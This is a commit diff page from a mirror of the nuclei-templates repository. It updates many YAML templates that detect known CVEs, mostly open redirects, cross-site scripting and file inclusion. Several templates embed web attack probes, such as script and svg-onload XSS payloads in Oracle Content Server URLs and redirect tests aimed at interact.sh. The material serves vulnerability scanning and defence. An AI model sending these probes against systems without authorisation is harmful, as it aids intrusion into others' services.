daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
vrenzolaverace 2022-11-06 12:26:41 +01:00 committed by GitHub
parent f9b9cd19c0 7d90e94792
commit d3eab98b4c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
391 changed files with 9950 additions and 2927 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
.new-additions
View File

@ -1,40 +0,0 @@
cves/2017/CVE-2017-5689.yaml
cves/2018/CVE-2018-19287.yaml
cves/2019/CVE-2019-18957.yaml
cves/2021/CVE-2021-24940.yaml
cves/2021/CVE-2021-27909.yaml
cves/2021/CVE-2021-41432.yaml
cves/2022/CVE-2022-0434.yaml
cves/2022/CVE-2022-0535.yaml
cves/2022/CVE-2022-27593.yaml
cves/2022/CVE-2022-33965.yaml
cves/2022/CVE-2022-40083.yaml
cves/2022/CVE-2022-40684.yaml
exposed-panels/flureedb-admin-console.yaml
exposed-panels/forti/fortiadc-panel.yaml
exposed-panels/fortinet/fortiap-panel.yaml
exposed-panels/fortinet/fortios-panel.yaml
exposed-panels/fortinet/fortitester-login-panel.yaml
exposed-panels/gogs-panel.yaml
exposed-panels/mantisbt-panel.yaml
exposed-panels/nordex-wind-farm-portal.yaml
exposed-panels/nozomi-panel.yaml
exposures/configs/babel-config-exposure.yaml
exposures/configs/guard-config.yaml
exposures/configs/rollup-js-config.yaml
exposures/configs/scrutinizer-config.yaml
exposures/files/npm-anonymous-cli.yaml
miscellaneous/x-recruiting-header.yaml
misconfiguration/apache-drill-exposure.yaml
misconfiguration/envoy-admin-exposure.yaml
misconfiguration/hadoop-unauth-rce.yaml
misconfiguration/locust-exposure.yaml
misconfiguration/seeyon-unauth.yaml
misconfiguration/tomcat-cookie-exposed.yaml
network/detection/cql-native-transport.yaml
network/detection/microsoft-ftp-service.yaml
technologies/aqua-enterprise-detect.yaml
technologies/google-frontend-httpserver.yaml
technologies/vmware/vmware-horizon-version.yaml
technologies/zimbra-detect.yaml
vulnerabilities/other/flatpress-xss.yaml

1
.nuclei-ignore
View File

@ -27,6 +27,7 @@ files:
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
- cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 |
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 |
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 |
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 |
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | |
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | |
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | |
| rce | 342 | princechaddha | 151 | file | 77 | | | | |
**301 directories, 4386 files**.
**307 directories, 4566 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

4216
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 |
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 |
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 |
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 |
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | |
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | |
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | |
| rce | 342 | princechaddha | 151 | file | 77 | | | | |

6
cnvd/2021/CNVD-2021-09650.yaml
View File

@ -1,12 +1,14 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform - Remote Command Injection
author: daffainfo
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0

36
cves/2007/CVE-2007-2449.yaml
View File

@ -1,36 +0,0 @@
id: CVE-2007-2449
info:
name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
author: pdteam
severity: low
description: Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which can be used by an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
- http://tomcat.apache.org/security-6.html
- http://tomcat.apache.org/security-4.html
- http://tomcat.apache.org/security-5.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
shodan-query: title:"Apache Tomcat"
tags: cve,cve2007,apache,misconfig,tomcat,disclosure,xss
requests:
- method: GET
path:
- "{{BaseURL}}/examples/jsp/snp/snoop.jsp"
matchers-condition: and
matchers:
- type: word
words:
- 'Request URI: /examples/jsp/snp/snoop.jsp'
- type: status
status:
- 200
# Enhanced by mp on 2022/09/15

2
cves/2010/CVE-2010-1980.yaml
View File

@ -4,7 +4,7 @@ info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980

2
cves/2010/CVE-2010-2033.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
name: Joomla! Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.

2
cves/2015/CVE-2015-4074.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2015-4074
info:
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.

8
cves/2016/CVE-2016-10368.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2016-10368
info:
name: Opsview Monitor Pro 4.5.x - Open Redirect
name: Opsview Monitor Pro - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
reference:
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/10/12

2
cves/2017/CVE-2017-1000029.yaml
View File

@ -31,4 +31,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/06/09
# Enhanced by mp on 2022/10/24

31
cves/2017/CVE-2017-10075.yaml
View File

@ -1,34 +1,47 @@
id: CVE-2017-10075
info:
name: Oracle Content Server Cross-Site Scripting
name: Oracle Content Server - Cross-Site Scripting
author: madrobot
severity: high
description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
description: |
Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
reference:
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2017-10075
metadata:
google-dork: inurl:"/cs/idcplg"
verified: "true"
tags: cve,cve2017,xss,oracle
requests:
- method: GET
path:
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(document.domain)>"
- "ORACLE_QUERY"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body
# Enhanced by mp on 2022/04/12

6
cves/2017/CVE-2017-11586.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2017-11586
info:
name: FineCms < 5.0.9 - Open redirect
name: FineCMS <5.0.9 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
- https://nvd.nist.gov/vuln/detail/CVE-2017-11586
@ -37,3 +37,5 @@ requests:
part: header
regex:
- 'Refresh:(.*)url=http:\/\/interact\.sh'
# Enhanced by mp on 2022/10/12

5
cves/2017/CVE-2017-12138.yaml
View File

@ -4,11 +4,12 @@ info:
name: XOOPS Core 2.5.8 - Open Redirect
author: 0x_Akoko
severity: medium
description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/XOOPS/XoopsCore25/issues/523
- https://xoops.org
- https://www.cvedetails.com/cve/CVE-2017-12138
- https://nvd.nist.gov/vuln/detail/CVE-2017-12138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

4
cves/2018/CVE-2018-12300.yaml
View File

@ -4,7 +4,7 @@ info:
name: Seagate NAS OS 4.3.15.1 - Open Redirect
author: 0x_Akoko
severity: medium
description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.
reference:
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12300
@ -26,3 +26,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

8
cves/2018/CVE-2018-12675.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2018-12675
info:
name: SV3C HD Camera L-SERIES - Open Redirect
name: SV3C HD Camera L Series - Open Redirect
author: 0x_Akoko
severity: medium
description: |
The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint.
SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory
- https://vuldb.com/?id.125799
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
- https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -30,3 +30,5 @@ requests:
part: body
words:
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-14474.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
name: Orange Forum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
@ -30,3 +30,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

7
cves/2018/CVE-2018-14574.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2018-14574
info:
name: Django Open Redirect
name: Django - Open Redirect
author: pikpikcu
severity: medium
description: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.
description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.djangoproject.com/weblog/2018/aug/01/security-releases/
- https://usn.ubuntu.com/3726-1/
@ -12,6 +12,7 @@ info:
- https://www.debian.org/security/2018/dsa-4264
- http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/
- https://access.redhat.com/errata/RHSA-2019:0265
- https://nvd.nist.gov/vuln/detail/CVE-2018-14574
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
- "Location: https://www.interact.sh"
- "Location: http://www.interact.sh"
part: header
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-16761.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
name: Eventum <3.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
@ -29,3 +29,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

18
cves/2018/CVE-2018-17246.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2018-17246
info:
name: Kibana - Local File Inclusion
author: princechaddha
author: princechaddha,thelicato
severity: critical
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
@ -25,19 +25,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"message\":\"An internal server error occurred\""
part: body
- type: word
part: header
words:
- "kbn-name"
- "application/json"
- "kibana"
condition: and
part: header
- type: status
status:
- 500
condition: or
case-insensitive: true
# Enhanced by mp on 2022/05/13
- type: word
part: header
words:
- "application/json"

7
cves/2018/CVE-2018-17422.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2018-17422
info:
name: dotCMS < 5.0.2 - Open Redirect
name: dotCMS <5.0.2 - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/dotCMS/core/issues/15286
- https://www.cvedetails.com/cve/CVE-2018-17422
- https://nvd.nist.gov/vuln/detail/CVE-2018-17422
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/13

6
cves/2018/CVE-2018-19287.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2018-19287
info:
name: Ninja Forms <= 3.3.17 - Cross-Site Scripting
name: WordPress Ninja Forms <3.3.18 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
XSS in the Ninja Forms plugin before 3.3.18 for WordPress allows Remote Attackers to execute JavaScript.
WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7
- https://wordpress.org/plugins/ninja-forms/
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

7
cves/2018/CVE-2018-6200.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2018-6200
info:
name: vBulletin 3.x.x & 4.2.x - Open Redirect
name: vBulletin - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://cxsecurity.com/issue/WLB-2018010251
- https://www.cvedetails.com/cve/CVE-2018-6200
- https://nvd.nist.gov/vuln/detail/CVE-2018-6200
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/13

6
cves/2019/CVE-2019-1010290.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2019-1010290
info:
name: Babel - Open Redirection
name: Babel - Open Redirect
author: 0x_Akoko
severity: medium
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
reference:
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
- http://dev.cmsmadesimple.org/project/files/729
@ -26,3 +26,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

10
cves/2019/CVE-2019-14223.yaml
View File

@ -1,14 +1,14 @@
id: CVE-2019-14223
info:
name: Alfresco Share Open Redirect
name: Alfresco Share - Open Redirect
author: pdteam
severity: medium
description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating
the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.).
description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D
- https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community
- https://nvd.nist.gov/vuln/detail/CVE-2019-14223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -31,4 +31,6 @@ requests:
- type: regex
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
# Enhanced by md on 2022/10/13

19
cves/2019/CVE-2019-14696.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-14696
info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14696
cwe-id: CWE-79
tags: packetstorm,cve,cve2019,xss
tags: xss,open-school,packetstorm,cve,cve2019
requests:
- method: GET
@ -24,12 +24,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/08/08

15
cves/2019/CVE-2019-18957.yaml
View File

@ -1,21 +1,22 @@
id: CVE-2019-18957
info:
name: Microstrategy Library before 11.1.3 XSS
name: MicroStrategy Library <11.1.3 - Cross-Site Scripting
author: tess
severity: medium
description: |
Microstrategy Library in MicroStrategy before 2019 before 11.1.3 has reflected XSS.
